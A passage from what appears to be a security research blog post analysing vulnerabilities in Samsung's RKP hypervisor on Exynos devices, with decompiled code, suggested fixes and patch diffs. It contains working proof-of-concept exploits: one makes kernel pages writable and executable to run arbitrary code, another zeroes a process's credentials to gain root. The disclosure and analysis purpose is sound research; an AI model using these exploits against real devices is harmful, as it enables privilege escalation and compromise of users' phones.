      uh_log('L', "rkp_dynamic.c", 400, "dynamic_load rm type:%d success", rkp_dyn->type);
    }
  } else {
    res = 0;
  }
  ret_va = regs->x4;
  if (ret_va) {
    *virt_to_phys_el1(ret_va) = res;
  }
  regs->x0 = res;
  return res;
}

There is one other subcommand, RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT, but it is not interesting because it can only be called before RKP is initialized.

int64_t dynamic_load_ins(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  if (dynamic_load_check(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 273, "dynamic_load_check failed");
    return 0xf13c0001;
  }
  if (dynamic_load_protection(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 280, "dynamic_load_protection failed");
    res = 0xf13c0002;
    goto EXIT_RW;
  }
  if (dynamic_load_verify_signing(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 288, "dynamic_load_verify_signing failed");
    res = 0xf13c0003;
    goto EXIT_RW;
  }
  if (dynamic_load_make_rox(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 295, "dynamic_load_make_rox failed");
    res = 0xf13c0004;
    goto EXIT_SET_PXN;
  }
  if (dynamic_load_add_executable(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 303, "dynamic_load_add_executable failed");
    res = 0xf13c0005;
    goto EXIT_RM_EXECUTABLE;
  }
  if (dynamic_load_add_dynlist(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 309, "dynamic_load_add_dynlist failed");
    res = 0xf13c0006;
    goto EXIT_RM_DYNLIST;
  }
  return 0;

EXIT_RM_DYNLIST:
  if (dynamic_load_rm_dynlist(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 317, "fail to dynamic_load_rm_dynlist, later in dynamic_load_ins");
  }
EXIT_RM_EXECUTABLE:
  if (dynamic_load_rm_executable(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 320, "fail to dynamic_load_rm_executable, later in dynamic_load_ins");
  }
EXIT_SET_PXN:
  if (dynamic_load_set_pxn(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 323, "fail to dynamic_load_set_pxn, later in dynamic_load_ins");
  }
EXIT_RW:
  if (dynamic_load_rw(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 326, "fail to dynamic_load_rw, later in dynamic_load_ins");
  }
  return res;
}

In the nominal case, dynamic_load_ins sequentially calls dynamic_load_check, dynamic_load_protection, dynamic_load_verify_signing, dynamic_load_make_rox, dynamic_load_add_executable and dynamic_load_add_dynlist.

If any of these functions fails (except dynamic_load_check), the hypervisor will try to undo what it has done so far by calling some or all of dynamic_load_rm_dynlist, dynamic_load_rm_executable, dynamic_load_set_pxn and dynamic_load_rw.

The vulnerability is once again two-fold:

  • memory that is currently R-X or RW- in the stage 2 will be made R-X by dynamic_load_protection, but on the first error dynamic_load_rw will be called and will make it RWX, regardless of its original permissions;
  • it is possible to pass memory that is read-only in the stage 2 to these functions, because the dynamic_load_check function doesn't validate the executable's code segments properly.
int64_t dynamic_load_check(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  if (rkp_dyn->type == RKP_DYN_MODULE) {
    return -1;
  }
  binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
  if (memlist_overlaps_range(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size)) {
    uh_log('L', "rkp_dynamic.c", 71, "dynamic_load[%p~%p] is overlapped with another", binary_base_pa,
           rkp_dyn->binary_size);
    return -1;
  }
  if (pgt_bitmap_overlaps_range(binary_base_pa, rkp_dyn->binary_size)) {
    uh_log('D', "rkp_dynamic.c", 76, "dynamic_load[%p~%p] is ro", binary_base_pa, rkp_dyn->binary_size);
  }
  return 0;
}

dynamic_load_check checks if the executable's binary range overlaps with any of the currently loaded executables. It also checks if the binary range overlaps with read-only memory in the stage 2. Unfortunately, this check is incomplete: it doesn't ensure that the code segments are located within the binary range.

Please note that the call to uh_log made when pgt_bitmap_overlaps_range returns a non-zero value uses 'D' as the first argument, meaning that uh_log will call uh_panic and the hypervisor will panic.

int64_t dynamic_load_protection(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  code_base1_pa = rkp_get_pa(rkp_dyn->code_base1);
  if (rkp_s2_range_change_permission(code_base1_pa, rkp_dyn->code_size1 + code_base1_pa, 0x80, 1, 2) < 0) {
    uh_log('L', "rkp_dynamic.c", 116, "Dynamic load: fail to make first code range RO %lx, %lx", rkp_dyn->code_base1,
           rkp_dyn->code_size1);
    return -1;
  }
  if (rkp_dyn->type != RKP_DYN_FIMC_COMBINED) {
    return 0;
  }
  code_base2_pa = rkp_get_pa(rkp_dyn->code_base2);
  if (rkp_s2_range_change_permission(code_base2_pa, rkp_dyn->code_size2 + code_base2_pa, 0x80, 1, 2) < 0) {
    uh_log('L', "rkp_dynamic.c", 124, "Dynamic load: fail to make second code range RO %lx, %lx", rkp_dyn->code_base2,
           rkp_dyn->code_size2);
    return -1;
  }
  return 0;
}

dynamic_load_protection will make the code segment(s) R-X in the stage 2 by calling rkp_s2_range_change_permission. Only executables of type RKP_DYN_FIMC_COMBINED can have two code segments. To avoid dynamic_load_verify_signing, and to get directly to dynamic_load_rw, we can make the second call to rkp_s2_range_change_permission fail by giving it an address that is not page-aligned.

int64_t dynamic_load_rw(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  code_base1_pa = rkp_get_pa(rkp_dyn->code_base1);
  if (rkp_s2_range_change_permission(code_base1_pa, rkp_dyn->code_size1 + code_base1_pa, 0, 1, 2) < 0) {
    uh_log('L', "rkp_dynamic.c", 239, "Dynamic load: fail to make first code range RO %lx, %lx", rkp_dyn->code_base1,
           rkp_dyn->code_size1);
    return -1;
  }
  if (rkp_dyn->type != RKP_DYN_FIMC_COMBINED) {
    return 0;
  }
  code_base2_pa = rkp_get_pa(rkp_dyn->code_base2);
  if (rkp_s2_range_change_permission(code_base2_pa, rkp_dyn->code_size2 + code_base2_pa, 0, 1, 2) < 0) {
    uh_log('L', "rkp_dynamic.c", 247, "Dynamic load: fail to make second code range RO %lx, %lx", rkp_dyn->code_base2,
           rkp_dyn->code_size2);
    return -1;
  }
  return 0;
}

dynamic_load_rw will make the code segment(s) RWX in the stage 2 by also calling rkp_s2_range_change_permission. If we gave an address that is not page-aligned in dynamic_load_protection, the second call to rkp_s2_range_change_permission will also fail here, but that's not an issue.

For reference (and to complete the Samsung RKP Compendium), you can find below the pseudo-code of all the other functions.

int64_t dynamic_load_verify_signing(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  if (NO_FIMC_VERIFY) {
    uh_log('L', "rkp_dynamic.c", 135, "FIMC Signature verification Skip");
    return 0;
  }
  if (rkp_dyn->type != RKP_DYN_FIMC && rkp_dyn->type != RKP_DYN_FIMC_COMBINED) {
    return 0;
  }
  binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
  if (fmic_signature_verify(binary_base_pa, rkp_dyn->binary_size)) {
    uh_log('W', "rkp_dynamic.c", 143, "FIMC Signature verification failed %lx, %lx", binary_base_pa,
           rkp_dyn->binary_size);
    return -1;
  }
  uh_log('L', "rkp_dynamic.c", 146, "FIMC Signature verification Success %lx, %lx", rkp_dyn->binary_base,
         rkp_dyn->binary_size);
  return 0;
}
int64_t dynamic_load_make_rox(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  res = rkp_set_range_to_rox(INIT_MM_PGD, rkp_dyn->code_base1, rkp_dyn->code_base1 + rkp_dyn->code_size1);
  if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
    res += rkp_set_range_to_rox(INIT_MM_PGD, rkp_dyn->code_base2, rkp_dyn->code_base2 + rkp_dyn->code_size2);
  }
  return res;
}
int64_t dynamic_load_add_executable(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  res = memlist_add(&executable_regions, rkp_dyn->code_base1, rkp_dyn->code_size1);
  if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
    res += memlist_add(&executable_regions, rkp_dyn->code_base2, rkp_dyn->code_size2);
  }
  return res;
}
int64_t dynamic_load_add_dynlist(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  dynlist_entry = static_heap_alloc(0x38, 0);
  memcpy(dynlist_entry, rkp_dyn, 0x38);
  binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
  return memlist_add_extra(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size, dynlist_entry);
}
int64_t dynamic_load_rm_dynlist(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
  res = memlist_remove_exact(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size, &dynlist_entry);
  if (res) {
    return res;
  }
  if (!dynlist_entry) {
    uh_log('W', "rkp_dynamic.c", 205, "No dynamic descriptor");
    return -11;
  }
  res = 0;
  if (rkp_dyn->code_base1 != dynlist_entry->code_base1 || rkp_dyn->code_size1 != dynlist_entry->code_size1) {
    --res;
  }
  if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED &&
      (rkp_dyn->code_base2 != dynlist_entry->code_base2 || rkp_dyn->code_size2 != dynlist_entry->code_size2)) {
    --res;
  }
  static_heap_free(dynlist_entry);
  return res;
}
int64_t dynamic_load_rm_executable(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  res = memlist_remove_exact(&executable_regions, rkp_dyn->code_base1, rkp_dyn->code_size1, 0);
  if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
    res += memlist_remove_exact(&executable_regions, rkp_dyn->code_base2, rkp_dyn->code_size2, 0);
  }
  return res;
}
int64_t dynamic_load_set_pxn(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  res = rkp_set_range_to_pxn(INIT_MM_PGD, rkp_dyn->code_base1, rkp_dyn->code_base1 + rkp_dyn->code_size1);
  if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
    res += rkp_set_range_to_pxn(INIT_MM_PGD, rkp_dyn->code_base2, rkp_dyn->code_base2 + rkp_dyn->code_size2);
  }
  return res;
}
int64_t dynamic_load_rm(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  if (dynamic_load_rm_dynlist(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 338, "dynamic_load_rm_dynlist failed");
    res = 0xf13c0007;
  } else if (dynamic_load_rm_executable(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 345, "dynamic_load_rm_executable failed");
    res = 0xf13c0008;
  } else if (dynamic_load_set_pxn(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 352, "dynamic_load_set_pxn failed");
    res = 0xf13c0009;
  } else if (dynamic_load_rw(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 359, "dynamic_load_rw failed");
    res = 0xf13c000a;
  } else {
    res = 0;
  }
  return res;
}

Exploitation

We have the ability to change memory that is R-X or RW- in the stage 2 to RWX. To be able to execute arbitrary code at EL1 using this vulnerability, the simplest way is to find a physical page that is already executable in the stage 1. Then we can use the virtual address of this page in the kernel's physmap (the Linux kernel physmap, not RKP's physmap) as a second mapping that is writable. By writing our code through the second mapping, and executing it from the first, we can achieve arbitrary code execution.

          stage 1   stage 2
 EXEC_VA ---------+--------> PAGE_PA
            R-X   |   R-X
                  |    ^---- will be changed to RWX
WRITE_VA ---------+
            RW-

By dumping the page tables of the stage 1, we easily found a double-mapped page.

...
ffffff80fa500000 - ffffff80fa700000 (PTE): R-X at 00000008f5520000 - 00000008f5720000
...
ffffffc800000000 - ffffffc880000000 (PMD): RW- at 0000000880000000 - 0000000900000000
...

For example, if we choose 0xffffff80fa6ff000 (a page of the R-X region starting at 0xffffff80fa500000) for the executable mapping, then the writable mapping will be at:

>>> EXEC_VA = 0xffffff80fa6ff000
>>> PAGE_PA = EXEC_VA - 0xffffff80fa500000 + 0x00000008f5520000
>>> PAGE_PA
0x8f571f000
>>> WRITE_VA = 0xffffffc800000000 + PAGE_PA - 0x0000000880000000
>>> WRITE_VA
0xffffffc87571f000

And by dumping the page tables of the stage 2, we can confirm that it is initially mapped as R-X.

...
0x8f571f000-0x8f5720000: S2AP=1, XN[1]=0
...

The last important thing we need to take into account when writing our exploit is the coherency of the data and instruction caches. To be safe, in our exploit we decided to prefix the code to execute with some "bootstrap" instructions that perform the necessary cache maintenance.
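
For reference, here is how the two packed constants used in the proof of concept below decode (our own annotation; each 64-bit value stores two AArch64 instructions, lower word first in memory, matching the Code: line of the kernel log further down):

/* bootstrap code performing the cache maintenance, disassembled:
 *   0xd5087620   dc ivac, x0    (invalidate data cache line by VA)
 *   0xd50b7520   ic ivau, x0    (invalidate instruction cache line by VA)
 *   0xd5033b9f   dsb ish        (data synchronization barrier)
 *   0xd5033fdf   isb            (instruction synchronization barrier)
 */
#define DC_IVAC_IC_IVAU 0xd50b7520d5087620UL
#define DSB_ISH_ISB     0xd5033fdfd5033b9fUL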

Proof of Concept

#define UH_APP_RKP            0xc300c002
#define RKP_DYNAMIC_LOAD      0x20
#define RKP_DYN_COMMAND_INS   0x01
#define RKP_DYN_FIMC_COMBINED 0x03

/* these 2 VAs point to the same PA */
#define EXEC_VA  0xffffff80fa6ff000UL
#define WRITE_VA 0xffffffc87571f000UL

/* bootstrap code to clean the caches */
#define DC_IVAC_IC_IVAU 0xd50b7520d5087620UL
#define DSB_ISH_ISB     0xd5033fdfd5033b9fUL

void exploit() {
    /* fill the structure given as argument */
    uint64_t rkp_dyn = kernel_alloc(0x38);
    kernel_write(rkp_dyn + 0x00, RKP_DYN_FIMC_COMBINED); // type
    kernel_write(rkp_dyn + 0x08, kernel_alloc(0x1000));  // binary_base
    kernel_write(rkp_dyn + 0x10, 0x1000);                // binary_size
    kernel_write(rkp_dyn + 0x18, EXEC_VA);               // code_base1
    kernel_write(rkp_dyn + 0x20, 0x1000);                // code_size1
    kernel_write(rkp_dyn + 0x28, EXEC_VA + 1);           // code_base2
    kernel_write(rkp_dyn + 0x30, 0x1000);                // code_size2

    /* call the hypervisor to make the page RWX */
    kernel_hyp_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, RKP_DYN_COMMAND_INS, rkp_dyn);

    /* copy the code using the writable mapping */
    uint32_t code[] = {
        0xdeadbeef,
        0,
    };
    kernel_write(WRITE_VA + 0x00, DC_IVAC_IC_IVAU);
    kernel_write(WRITE_VA + 0x08, DSB_ISH_ISB);
    for (int i = 0; i < sizeof(code) / sizeof(uint64_t); ++i)
        kernel_write(WRITE_VA + 0x10 + i * 8, code[i * 2]);

    /* and execute it using the executable mapping */
    kernel_exec(EXEC_VA, WRITE_VA);
}

As a result of running the proof of concept, we get an undefined instruction exception, which we can observe in the kernel log (note the (deadbeef) part):

<2>[  207.365236]  [3:     rkp_exploit:15549] sec_debug_set_extra_info_fault = UNDF / 0xffffff80fa6ff018
<2>[  207.365310]  [3:     rkp_exploit:15549] sec_debug_set_extra_info_fault: 0x1 / 0x726ff018
<0>[  207.365338]  [3:     rkp_exploit:15549] undefined instruction: pc=00000000dec42a2e, rkp_exploit[15549] (esr=0x2000000)
<6>[  207.365361]  [3:     rkp_exploit:15549] Code: d5087620 d50b7520 d5033b9f d5033fdf (deadbeef)
<0>[  207.365372]  [3:     rkp_exploit:15549] Internal error: undefined instruction: 2000000 [#1] PREEMPT SMP
<4>[  207.365386]  [3:     rkp_exploit:15549] Modules linked in:
<0>[  207.365401]  [3:     rkp_exploit:15549] Process rkp_exploit (pid: 15549, stack limit = 0x00000000b4f56d76)
<0>[  207.365418]  [3:     rkp_exploit:15549] debug-snapshot: core register saved(CPU:3)
<0>[  207.365430]  [3:     rkp_exploit:15549] L2ECTLR_EL1: 0000000000000007
<0>[  207.365438]  [3:     rkp_exploit:15549] L2ECTLR_EL1 valid_bit(30) is NOT set (0x0)
<0>[  207.365456]  [3:     rkp_exploit:15549] CPUMERRSR: 0000000000040001, L2MERRSR: 0000000013000000
<0>[  207.365468]  [3:     rkp_exploit:15549] CPUMERRSR valid_bit(31) is NOT set (0x0)
<0>[  207.365480]  [3:     rkp_exploit:15549] L2MERRSR valid_bit(31) is NOT set (0x0)
<0>[  207.365491]  [3:     rkp_exploit:15549] debug-snapshot: context saved(CPU:3)
<6>[  207.365541]  [3:     rkp_exploit:15549] debug-snapshot: item - log_kevents is disabled
<6>[  207.365574]  [3:     rkp_exploit:15549] TIF_FOREIGN_FPSTATE: 0, FP/SIMD depth 0, cpu: 89
<4>[  207.365590]  [3:     rkp_exploit:15549] CPU: 3 PID: 15549 Comm: rkp_exploit Tainted: G        W       4.14.113 #14
<4>[  207.365602]  [3:     rkp_exploit:15549] Hardware name: Samsung A51 EUR OPEN REV01 based on Exynos9611 (DT)
<4>[  207.365617]  [3:     rkp_exploit:15549] task: 00000000dcac38cb task.stack: 00000000b4f56d76
<4>[  207.365632]  [3:     rkp_exploit:15549] PC is at 0xffffff80fa6ff018
<4>[  207.365644]  [3:     rkp_exploit:15549] LR is at 0xffffff80fa6ff004

The exploit was successfully tested on the most recent firmware available for our test device (at the time of the report): A515FXXU4CTJ1. The two-fold bug appeared to be present in the binaries of Exynos devices, including the S10/S10+/S20/S20+ flagship devices, but its exploitability on these devices is uncertain.

The prerequisites for exploiting this vulnerability are high: being able to make a hypervisor call with only an arbitrary read and write of kernel memory is no small feat on devices where JOPP/ROPP are enabled.

Patch

Here are the immediate remediation steps we suggested to Samsung:

- Implement thorough checking in the "dynamic executable" commands:
    - The code segment(s) should not overlap any read-only pages
    (maybe checking the ro_bitmap or calling is_phys_map_free is enough)
    - dynamic_load_rw should not make the code segment(s) executable on failure
    (to prevent abusing it to create executable kernel pages...)
    - Ensure signature checking is enabled (it was disabled on some devices)

To see how Samsung patched this vulnerability, we binary diffed the most recent firmware available for the Samsung Galaxy S10 (at the time of checking the first patch): G973FXXSBFUF3. We could not use the latest firmware for the Samsung Galaxy A51 as this device had not been updated to the June patch level yet.

There have been some changes to dynamic_load_check:

int64_t dynamic_load_check(rkp_dynamic_load_t *rkp_dyn) {
    // ...

    if (rkp_dyn->type == RKP_DYN_MODULE)
        return -1;
+    binary_base = rkp_dyn->binary_base;
+    binary_end = rkp_dyn->binary_size + binary_base;
+    code_base1 = rkp_dyn->code_base1;
+    code_end1 = rkp_dyn->code_size1 + code_base1;
+    if (code_base1 < binary_base || code_end1 > binary_end) {
+        uh_log('L', "rkp_dynamic.c", 71, "RKP_21f66fc1");
+        return -1;
+    }
+    if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
+        code_base2 = rkp_dyn->code_base2;
+        code_end2 = rkp_dyn->code_size2 + code_base2;
+        if (code_base2 < binary_base || code_end2 > binary_end) {
+            uh_log('L', "rkp_dynamic.c", 77, "RKP_915550ac");
+            return -1;
+        }
+        if ((code_base1 > code_base2 && code_base1 < code_end2)
+                || (code_base2 > code_base1 && code_base2 < code_end1)) {
+            uh_log('L', "rkp_dynamic.c", 83, "RKP_67b1bc82");
+            return -1;
+        }
+    }
    binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
    if (memlist_overlaps_range(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size)) {
        uh_log('L', "rkp_dynamic.c", 91, "dynamic_load[%p~%p] is overlapped with another", binary_base_pa,rkp_dyn->binary_size);
        return -1;
    }
    if (pgt_bitmap_overlaps_range(binary_base_pa, rkp_dyn->binary_size))
        uh_log('D', "rkp_dynamic.c", 96, "dynamic_load[%p~%p] is ro", binary_base_pa, rkp_dyn->binary_size);
    return 0;
}

Some checks were added to ensure that both code segments are within the binary's address range. The new checks don't account for integer overflows on all the base + size additions, but we noticed that was fixed as well in the October security update.
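
To illustrate the missed overflow, here is a small sketch with hypothetical values (we did not investigate whether such a wrapped range is actually exploitable further down the call chain):

#include <assert.h>
#include <stdint.h>

int main(void) {
    uint64_t binary_base = 0x880000000ULL;
    uint64_t binary_end  = binary_base + 0x1000;
    uint64_t code_base1  = binary_base;
    uint64_t code_size1  = 0ULL - code_base1 + 0x10; /* huge size that wraps */
    uint64_t code_end1   = code_base1 + code_size1;  /* wraps around to 0x10 */
    /* the June containment check is satisfied despite the bogus size */
    assert(!(code_base1 < binary_base || code_end1 > binary_end));
    return 0;
}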

Because the binary's address range is then checked against the ro_bitmap by the call to pgt_bitmap_overlaps_range, it should no longer be possible to change memory that is R-X into RWX in the stage 2. It is still possible to change memory that is RW- into RWX, but there are already RWX pages in the stage 2 and the hypervisor ensures that if such a page is mapped as executable in the stage 1, it will be changed to read-only in the stage 2.

Writing to read-only kernel memory

SVE-2021-20176 (CVE-2021-25411): Vulnerable api in RKP allows attackers to write read-only kernel memory

Severity: Moderate
Affected versions: Q(10.0), R(11.0) devices with Exynos9610, 9810, 9820, 9830
Reported on: January 4, 2021
Disclosure status: Privately disclosed.
Improper address validation vulnerability in RKP api prior to SMR JUN-2021 Release 1 allows root privileged local attackers to write read-only kernel memory.
The patch adds a proper address validation check to prevent unprivileged write to kernel memory.

Vulnerability

The virt_to_phys_el1 function is used by RKP to convert a virtual address into a physical address.

uint64_t virt_to_phys_el1(uint64_t addr) {
  // ...

  if (!addr) {
    return 0;
  }
  cs_enter(s2_lock);
  ats12e1r(addr);
  isb();
  par_el1 = get_par_el1();
  if ((par_el1 & 1) != 0) {
    ats12e1w(addr);
    isb();
    par_el1 = get_par_el1();
  }
  cs_exit(s2_lock);
  if ((par_el1 & 1) != 0) {
    isb();
    if ((get_sctlr_el1() & 1) != 0) {
      uh_log('W', "vmm.c", 135, "%sRKP_b0a499dd %p", "virt_to_phys_el1", addr);
      if (!dword_87035098) {
        dword_87035098 = 1;
        print_stack_contents();
      }
      dword_87035098 = 0;
    }
    return 0;
  } else {
    return (par_el1 & 0xfffffffff000) | (addr & 0xfff);
  }
}

virt_to_phys_el1 uses the AT S12E1R (Address Translate Stages 1 and 2 EL1 Read) instruction. This instruction performs stage 1 and 2 address translation, with permissions as if reading from the given virtual address at EL1. It then checks the PAR_EL1 (Physical Address Register) register, which contains the output address of the address translation instruction if it executed successfully, or fault information if it did not.

If the address translation instruction failed, virt_to_phys_el1 then uses the AT S12E1W (Address Translate Stages 1 and 2 EL1 Write) instruction. This instruction performs stage 1 and 2 address translation, with permissions as if writing to the given virtual address at EL1. It then also checks the PAR_EL1 register.

If either of the two translation instructions succeeded, virt_to_phys_el1 returns the output address. Otherwise, if the MMU is enabled, it logs a message and prints the kernel stack contents (but only once).

Some of RKP's command handlers will call virt_to_phys_el1 to convert a kernel virtual address, with the intent of writing to the corresponding physical address. Since virt_to_phys_el1 returns a physical address as long as the virtual address is readable or writable from EL1, we can abuse this to make the hypervisor write to memory that is read-only for the kernel.

Exploitation

Interesting targets include anything that is set as read-only in the stage 2, e.g. the kernel page tables, struct cred, struct task_security_struct, etc.

We need to find the command handlers using virt_to_phys_el1 that can be called after the hypervisor is fully initialized. The relevant command handlers are:

  • rkp_cmd_rkp_robuffer_alloc, that will write the address of the newly allocated page;
int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t* regs) {
  // ...
  page = page_allocator_alloc_page();
  ret_va = regs->x2;
  // ...
  if (ret_va) {
    // ...
    *virt_to_phys_el1(ret_va) = page;
  }
  regs->x0 = page;
  return 0;
}
  • rkp_cmd_dynamic_load, that will write the return code of the command.
int64_t rkp_cmd_dynamic_load(saved_regs_t* regs) {
  // ...
  if (type == RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT) {
    res = dynamic_breakdown_before_init(rkp_dyn);
    // ...
  } else if (type == RKP_DYN_COMMAND_INS) {
    res = dynamic_load_ins(rkp_dyn);
    // ...
  } else if (type == RKP_DYN_COMMAND_RM) {
    res = dynamic_load_rm(rkp_dyn);
    // ...
  } else {
    res = 0;
  }
  ret_va = regs->x4;
  if (ret_va) {
    *virt_to_phys_el1(ret_va) = res;
  }
  regs->x0 = res;
  return res;
}

In particular, when specifying an invalid subcommand to rkp_cmd_dynamic_load, the return code will be 0, which can be used to change a UID/GID to 0 (root).
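
As a reminder of why the loop in the proof of concept below zeroes offsets 4 to 32 of the struct cred, here is the relevant part of its layout (mainline field order; the exact offsets assume no vendor-specific or debug fields before the IDs):

// from include/linux/cred.h (beginning of the structure, simplified)
struct cred {
    atomic_t usage;   /* offset 0x00 */
    kuid_t   uid;     /* offset 0x04: real UID */
    kgid_t   gid;     /* offset 0x08: real GID */
    kuid_t   suid;    /* offset 0x0c: saved UID */
    kgid_t   sgid;    /* offset 0x10: saved GID */
    kuid_t   euid;    /* offset 0x14: effective UID */
    kgid_t   egid;    /* offset 0x18: effective GID */
    kuid_t   fsuid;   /* offset 0x1c: UID for VFS operations */
    kgid_t   fsgid;   /* offset 0x20: GID for VFS operations */
    /* ... */
};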

Proof of Concept

#define UH_APP_RKP       0xc300c002
#define RKP_DYNAMIC_LOAD 0x20

void print_ids() {
    uid_t ruid, euid, suid;
    getresuid(&ruid, &euid, &suid);
    printf("Uid: %d %d %d\n", ruid, euid, suid);

    gid_t rgid, egid, sgid;
    getresgid(&rgid, &egid, &sgid);
    printf("Gid: %d %d %d\n", rgid, egid, sgid);
}

void write_zero(uint64_t rkp_dyn_p, uint64_t ret_p) {
    kernel_hyp_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, 42, rkp_dyn_p, ret_p);
}

void exploit() {
    /* print the old credentials */
    print_ids();

    /* get the struct cred of the current task */
    uint64_t current = kernel_get_current();
    uint64_t cred = kernel_read(current + 1968);

    /* allocate the argument structure */
    uint64_t rkp_dyn_p = kernel_alloc(0x38);
    /* zero the fields of the struct cred */
    for (int i = 4; i < 36; i += 4)
        write_zero(rkp_dyn_p, cred + i);

    /* print the new credentials */
    print_ids();
}
Uid: 2000 2000 2000
Gid: 2000 2000 2000
Uid: 0 0 0
Gid: 0 0 0

As a result of running the proof of concept, we can see that our credentials changed from shell to root.

The exploit was successfully tested on the most recent firmware available for our test device (at the time of the report): A515FXXU4CTJ1. The bug appeared to be present in the binaries of Exynos devices, including the S10/S10+/S20/S20+ flagship devices, but its exploitability on these devices is uncertain.

The prerequisites for exploiting this vulnerability are high: being able to make a hypervisor call with only an arbitrary read and write of kernel memory is no small feat on devices where JOPP/ROPP are enabled.

Patch

Here is the immediate remediation step that we suggested to Samsung:

- Add a flag to virt_to_phys_el1 to specify if it should check if the memory
needs to be readable or writable from the kernel, or split this function in two
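
For illustration, a minimal sketch of what such a flagged variant could look like, reusing the helpers from the pseudo-code of virt_to_phys_el1 above (this is our own hypothetical code, not Samsung's patch):

uint64_t virt_to_phys_el1_checked(uint64_t addr, uint32_t for_write) {
  uint64_t par_el1;

  if (!addr) {
    return 0;
  }
  cs_enter(s2_lock);
  /* only perform the translation for the access type the caller intends */
  if (for_write) {
    ats12e1w(addr);
  } else {
    ats12e1r(addr);
  }
  isb();
  par_el1 = get_par_el1();
  cs_exit(s2_lock);
  /* PAR_EL1.F (bit 0) set means the translation faulted for this access */
  if ((par_el1 & 1) != 0) {
    return 0;
  }
  return (par_el1 & 0xfffffffff000) | (addr & 0xfff);
}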

To see how Samsung patched this vulnerability, we binary diffed the most recent firmware available for the Samsung Galaxy S10 (at the time of checking the first patch): G973FXXSBFUF3. We could not use the latest firmware for the Samsung Galaxy A51 as this device had not been updated to the June patch level yet.

There have been some changes to rkp_cmd_rkp_robuffer_alloc and rkp_cmd_dynamic_load.

int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t *regs) {
  // ...
  page = page_allocator_alloc_page();
  ret_va = regs->x2;
  // ...
  if (ret_va) {
    // ...
-    *virt_to_phys_el1(ret_va) = page;
+    ret_pa = virt_to_phys_el1(ret_va);
+    rkp_phys_map_lock(ret_pa);
+    if (!is_phys_map_free(ret_pa)) {
+      rkp_phys_map_unlock(ret_pa);
+      rkp_policy_violation("RKP_07fb818a");
+    }
+    *ret_pa = page;
+    rkp_phys_map_unlock(ret_pa);
  }
  regs->x0 = page;
  return 0;
}
int64_t rkp_cmd_dynamic_load(saved_regs_t *regs) {
  // ...
  if (type == RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT) {
    res = dynamic_breakdown_before_init(rkp_dyn);
    // ...
  } else if (type == RKP_DYN_COMMAND_INS) {
    res = dynamic_load_ins(rkp_dyn);
    // ...
  } else if (type == RKP_DYN_COMMAND_RM) {
    res = dynamic_load_rm(rkp_dyn);
    // ...
  } else {
    res = 0;
  }
  ret_va = regs->x4;
-  if (ret_va)
-    *virt_to_phys_el1(ret_va) = res;
+  if (ret_va) {
+    ret_pa = rkp_get_pa(ret_va);
+    rkp_phys_map_lock(ret_pa);
+    if (!is_phys_map_free(ret_pa)) {
+      rkp_phys_map_unlock(ret_pa);
+      rkp_policy_violation("RKP_07fb818a");
+    }
+    rkp_phys_map_unlock(ret_pa);
+    *ret_pa = res;
+  }
  regs->x0 = res;
  return res;
}

The two command handlers that we said could be used to exploit this vulnerability were modified. Specifically, they are now checking that the kernel-provided address is marked as FREE in the physmap, and triggering a policy violation if it isn't.

While the patch works, because there are no other command handlers accessible after initialization that use virt_to_phys_el1, we think it is suboptimal:

  • it is possible that someone at Samsung might forget to implement the new check when adding a new command handler, which would not have been an issue if they had added a flag denoting read or write access to virt_to_phys_el1 like we suggested;
  • it also assumes that anything that is not writable from the kernel will never be marked as FREE in the physmap; if that ever stops being true, this vulnerability will be reintroduced.

Conclusion

In this conclusion, we would like to give you our honest thoughts about Samsung RKP and its implementation (as of early 2021).

Talking strictly about the implementation itself, we think that because the codebase has been around for a few years already, it has grown a lot in complexity. This might explain why vulnerabilities like the ones we have seen today, as well as configuration mistakes, can happen. We are confident that there are other bugs lurking in the code that we have glossed over. In particular, the choice of duplicating information that is already in the stage 2 page tables (for example the S2AP bit and the ro_bitmap) is very error-prone. In the future, we will be blogging about another security hypervisor implementation that does things differently, and comparing it to Samsung's implementation.

